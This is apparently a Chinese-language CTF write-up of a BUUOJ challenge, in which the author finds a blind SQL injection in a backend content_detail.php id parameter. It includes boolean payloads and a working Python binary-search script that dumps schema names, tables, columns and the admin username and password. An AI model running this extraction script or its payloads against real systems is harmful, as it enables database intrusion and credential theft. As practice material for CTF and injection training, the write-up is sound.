这道题不难但是我写篇记录一下因为是第一次遇到这种的
首先我们进入登录页面尝试注入,没有任何回显,我便以为是盲注,但是payload改变而回显没有改变
开始寻找
注入点,居然在这里面,我服了
开始尝试
成功
-1||1
-1||0
其实还是fuzz好一点,像我这种没本子的手测了老半天了
写脚本的时候我以为flag在表里面结果没有,最后想着还有个登录界面,然后换了个表来注入出用户名密码,登录就有flag
import requests
flag = ""
i = 0
while True:
i += 1
low = 32
high = 127
while low < high:
mid = (high + low) // 2
# url = f"http://b7d7c92e-c958-422a-af15-4e4eab33c2e2.node5.buuoj.cn:81/backend/content_detail.php?id=-1||(if(ascii(substr((database()),{i},1))>{mid},1,0))"
# url = f"http://b7d7c92e-c958-422a-af15-4e4eab33c2e2.node5.buuoj.cn:81/backend/content_detail.php?id=-1||(if(ascii(substr((SElect(group_concat(schema_name))from(information_schema.schemata)),{i},1))>{mid},1,0))"
# information_schema, ctftraining, mysql, performance_schema, test, news
# url = f"http://b7d7c92e-c958-422a-af15-4e4eab33c2e2.node5.buuoj.cn:81/backend/content_detail.php?id=-1||(if(ascii(substr((SElect(group_concat(table_name))from(information_schema.tables)where(table_schema='news')),{i},1))>{mid},1,0))"
# admin,contents
# url = f"http://b7d7c92e-c958-422a-af15-4e4eab33c2e2.node5.buuoj.cn:81/backend/content_detail.php?id=-1||(if(ascii(substr((SElect(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),{i},1))>{mid},1,0))"
url = f"http://b7d7c92e-c958-422a-af15-4e4eab33c2e2.node5.buuoj.cn:81/backend/content_detail.php?id=-1||(if(ascii(substr((SELECt(group_concat(username,password))from(news.admin)),{i},1))>{mid},1,0))"
r = requests.get(url=url)
if 'title' in r.text:
low = mid + 1
else:
high = mid
if low != 32:
flag += chr(low)
else:
break
print(flag)